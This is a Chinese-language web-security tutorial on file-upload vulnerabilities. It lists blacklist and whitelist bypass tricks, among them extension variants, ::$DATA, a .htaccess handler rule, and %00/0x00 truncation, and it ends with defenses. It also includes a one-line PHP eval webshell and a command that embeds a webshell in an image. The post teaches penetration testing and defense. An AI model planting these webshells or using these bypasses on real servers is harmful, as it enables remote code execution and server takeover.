Web安全-文件上传漏洞-黑白名单及其它绕过思路(附思维导图)

什么是文件上传漏洞

文件上传漏洞是指应用程序未对用户上传的文件进行严格校验(如类型、后缀、内容、权限等),导致攻击者可上传恶意文件(如可执行脚本、木马程序)到服务器,进而通过访问恶意文件获取服务器权限、窃取数据或发起进一步攻击的安全缺陷,其核心风险在于恶意文件被服务器成功解析执行,常见于未做过滤或过滤逻辑存在漏洞的网站上传功能。

1.黑名单绕过

1.空格绕过

如:"1.php "

2.大小写绕过

如:1.phP

3.加点绕过

如:1.php.

4.::$DATA绕过

如:1.php::$DATA

5.复写绕过

如:1.pphphp

6.加一些字符绕过

如:1.phtml,1.pht,1.phps,1.php3,1.php4,1.php5,1.php3p等

6.htaccess绕过

对于apache中间件

<FilesMatch "as.png">setHandler application/x-httpd-php</FilesMatch>

.htaccess 绕过的核心是利用服务器配置缺陷、解析差异或请求篡改,常见思路包括通过文件名 / 路径篡改(如加特殊字符、路径遍历)、HTTP 请求头伪造(如改 X-Forwarded-For)、服务器解析规则漏洞(如 MultiViews 启用、解析优先级问题)、规则逻辑缺陷(如大小写混合绕过正则匹配)绕过后端访问限制,需注意该行为仅适用于合法授权的渗透测试,严禁未授权操作,且需结合目标服务器(Apache、Nginx 等)实际配置调整策略,现代安全防护工具也会拦截常见手段,合规场景下可通过针对性安全检查优化.htaccess 配置

2.白名单绕过

1.%00截断

php版本小于5.3.29

%00为结束符

先上传一个可上传文件,如1.png

利用bp修改url,如:1.php%00

2.0x00截断

0x00会被系统识别为结束符

利用bp修改16进制

先加空格,通过hex找到空格20,将其改为00

3.其它绕过方式

  1. 修改文件幻数绕过内容检测

使用16进制编辑器打开一个图片,在图片后面插入WebShell

或者cmd下执行:copy aaa.jpg/b+test.php/a shell.jpg

2.条件竞争

大量发包绕过文件删除

<?php fputs(fopen('xiao.php','w'),'<?php eval($_REQUEST[1]);?>');?>

4.文件上传漏洞的防御

1.上传的目录设置为不可执行。只要web容器无法解析该目录下面的文件,即使攻击者上传了脚本文件服务器本身也不会受到影响,因此这一点至关重要。

  1. 对文件后缀的判断中使用白名单的方式。

3.文件服务器和web服务器分离,也就是上传的文件单独存放到其他的服务器之中。

4.不需要返回文件路径的情况下,随机改写文件名。

相关推荐
Mintopia2 小时前
🌱 AIGC 技术的轻量化趋势:Web 端“小而美”模型的崛起
前端·javascript·aigc
开发者小天2 小时前
React中的useRef的用法
开发语言·前端·javascript·react.js
xixixin_2 小时前
【React】检测元素是否出现在用户视窗内
开发语言·前端·javascript·react.js
newxtc2 小时前
【锦州通APP注册_登录安全-无验证方式导致安全隐患】
人工智能·selenium·测试工具·安全·政务
疏狂难除3 小时前
spiderdemo第22题与webassembly的跨域
开发语言·javascript·爬虫·rust·wasm·mitmproxy
lpfasd1233 小时前
GEO崛起与AI信任危机:数据源安全如何守护智能时代的基石?
大数据·人工智能·安全
unable code4 小时前
攻防世界-Misc-掀桌子
网络安全·ctf·misc·1024程序员节
yumgpkpm5 小时前
CMP(类Cloudera CDP 7.3 404版华为泰山Kunpeng)和Apache Doris的对比
大数据·hive·hadoop·spark·apache·hbase·cloudera
zhangkaixuan4566 小时前
Apache Paimon 查询全流程深度分析
java·apache·paimon